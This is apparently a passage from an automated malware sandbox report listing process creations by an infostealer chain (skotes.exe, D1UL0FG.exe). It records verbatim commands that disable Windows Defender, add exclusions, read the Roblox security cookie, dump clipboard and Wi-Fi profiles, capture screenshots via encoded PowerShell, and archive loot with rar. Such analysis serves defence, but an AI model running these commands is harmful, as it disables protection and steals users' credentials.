                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeProcess created: C:\Users\Public\Netstat\FuturreApp.exe "C:\Users\Public\Netstat\FuturreApp.exe"
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe "C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe"
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeProcess created: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe "C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe"
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe "C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe"
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe a -r -hp"yeezy222" "C:\Users\user\AppData\Local\Temp\vLqBW.zip" *"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe a -r -hp"yeezy222" "C:\Users\user\AppData\Local\Temp\vLqBW.zip" *
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe "C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe "C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe "C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2DEF.tmp" "c:\Users\user\AppData\Local\Temp\l2sopuet\CSC2774EC596431493C9BAB8956CFD3669.TMP"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe'"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe""Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe a -r -hp"yeezy222" "C:\Users\user\AppData\Local\Temp\vLqBW.zip" *"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe'
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe'
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.cmdline"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2DEF.tmp" "c:\Users\user\AppData\Local\Temp\l2sopuet\CSC2774EC596431493C9BAB8956CFD3669.TMP"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
